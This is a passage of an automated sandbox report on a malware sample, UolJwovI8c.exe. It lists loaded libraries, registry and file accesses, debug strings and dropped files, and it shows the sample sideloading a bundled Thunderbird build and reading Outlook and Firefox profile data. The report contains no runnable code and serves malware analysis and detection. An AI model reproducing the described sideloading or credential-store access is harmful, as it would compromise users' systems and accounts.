Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32

Jump to behavior

Source: dicxrxnwre.8.dr

LNK file: ..\..\Roaming\GZManage\thunderbird.exe

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: UolJwovI8c.exe

Static file information: File size 10750445 > 1048576

Source: UolJwovI8c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UolJwovI8c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UolJwovI8c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UolJwovI8c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UolJwovI8c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UolJwovI8c.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: UolJwovI8c.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: UolJwovI8c.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: UolJwovI8c.exe, 00000000.00000000.2141512330.00000000005DB000.00000002.00000001.01000000.00000003.sdmp, UolJwovI8c.exe, 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmp, UolJwovI8c.exe, 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmp, UolJwovI8c.exe, 00000002.00000000.2146405308.000000000055B000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\smime\smime3.pdb source: thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\lib\libc\src\plc4.pdb source: thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb0x source: Qjsync.exe, 0000000C.00000002.2990467872.0000000000807000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\xpcom\build\xpcom_core.pdb source: UolJwovI8c.exe, 00000002.00000003.2152299284.0000000001237000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000002.2266453328.00000000030F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\js\src\js3250.pdb source: thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Qjsync.exe, 0000000C.00000002.2990467872.0000000000807000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Qjsync.exe, 0000000C.00000002.2993611855.0000000004625000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994456320.000000000502D000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2995684403.000000000562C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3002973538.0000000006428000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993940701.0000000004A2E000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992434111.0000000003C2E000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2997448882.0000000005820000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993776348.000000000482B000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3001297741.0000000006023000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3001773674.0000000006222000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3009942750.000000000682F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994768666.0000000005227000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2998408291.0000000005A2A000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990815003.000000000231E000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2995178015.0000000005424000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010883351.0000000006E23000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994299092.0000000004E2B000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992753897.0000000004029000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010479279.0000000006A26000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994106239.0000000004C25000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3011054669.0000000007027000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2999681039.0000000005C26000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992266988.0000000003A2F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2991394784.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010694132.0000000006C2F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992592814.0000000003E21000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992985783.0000000004228000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3009392654.0000000006627000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993433030.0000000004426000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3000721798.0000000005E20000.00000004.00000001.000200
Source:	Binary string: C:\bb\ke-win-x86-r\edit-6.1\build\release\scintilla\bin\SciLexer.pdb source: UolJwovI8c.exe, 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: thunderbird.exe, 00000003.00000002.2267589142.000000000414F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000002.2267700401.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2424320446.00000000048BE000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2424021424.00000000041A6000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2424136432.0000000004500000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2659895514.0000000004DD1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2661703622.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, thunderbird.exe, 0000000D.00000002.2906941608.0000000004480000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 0000000D.00000002.2906825762.0000000004123000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Qjsync.exe, 0000000C.00000002.2993611855.0000000004625000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994456320.000000000502D000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2995684403.000000000562C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3002973538.0000000006428000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993940701.0000000004A2E000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992434111.0000000003C2E000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2997448882.0000000005820000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993776348.000000000482B000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3001297741.0000000006023000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3001773674.0000000006222000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3009942750.000000000682F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994768666.0000000005227000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2998408291.0000000005A2A000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990815003.000000000231E000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2995178015.0000000005424000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010883351.0000000006E23000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994299092.0000000004E2B000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992753897.0000000004029000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010479279.0000000006A26000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994106239.0000000004C25000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3011054669.0000000007027000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2999681039.0000000005C26000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992266988.0000000003A2F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2991394784.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010694132.0000000006C2F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992592814.0000000003E21000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992985783.0000000004228000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3009392654.0000000006627000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993433030.0000000004426000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3000721798.0000000005E20000.00000004.00000001.000
Source:	Binary string: wntdll.pdb source: thunderbird.exe, 00000003.00000002.2267589142.000000000414F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000002.2267700401.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2424320446.00000000048BE000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2424021424.00000000041A6000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2424136432.0000000004500000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2659895514.0000000004DD1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2661703622.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, thunderbird.exe, 0000000D.00000002.2906941608.0000000004480000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 0000000D.00000002.2906825762.0000000004123000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: gecko_browsers\Firefox\profiles\2o7hffxt.default-release\pkcs11.txti\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Qjsync.exe, 0000000C.00000002.2990467872.0000000000807000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\mail\app\thunderbird.pdb source: thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\softokn\softokn3.pdb source: thunderbird.exe, 00000003.00000003.2261284458.00000000030F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\nss\nss3.pdb source: thunderbird.exe, 00000003.00000003.2260894204.00000000030F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Qjsync.exe, 0000000C.00000002.2990467872.0000000000807000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\pr\src\nspr4.pdb source: thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp

Source: UolJwovI8c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: UolJwovI8c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: UolJwovI8c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: UolJwovI8c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: UolJwovI8c.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Code function: 2_2_1006FAB0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_1006FAB0

Source: xpcom_core.dll.3.dr	Static PE information: real checksum: 0x744ed should be: 0x73f41
Source: idrccptxisabu.8.dr	Static PE information: real checksum: 0x294459 should be: 0x290abc
Source: xpcom_core.dll.2.dr	Static PE information: real checksum: 0x744ed should be: 0x73f41
Source: ekxwihvmv.20.dr	Static PE information: real checksum: 0x294459 should be: 0x290abc
Source: Trombone.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x9c0ef

Source: UolJwovI8c.exe	Static PE information: section name: .wixburn
Source: UolJwovI8c.exe.0.dr	Static PE information: section name: .wixburn
Source: Qjsync.exe.8.dr	Static PE information: section name: Shared
Source: idrccptxisabu.8.dr	Static PE information: section name: .xdata
Source: idrccptxisabu.8.dr	Static PE information: section name: utage
Source: ekxwihvmv.20.dr	Static PE information: section name: .xdata
Source: ekxwihvmv.20.dr	Static PE information: section name: utage

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005BEAD6 push ecx; ret	0_2_005BEAE9
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0053EAD6 push ecx; ret	2_2_0053EAE9
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10069B01 push ecx; ret	2_2_10069B14
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_10063D94 push ecx; ret	2_2_10063DA7

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

File written: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe

Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe	File created: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\idrccptxisabu	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\xpcom_compat.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ekxwihvmv	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\smime3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plds4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldappr32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nspr4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\ssl3.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\plc4.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_compat.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\Trombone.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	File created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_core.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\smime3.dll	Jump to dropped file
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	File created: C:\Users\user\AppData\Roaming\GZManage\ssl3.dll	Jump to dropped file
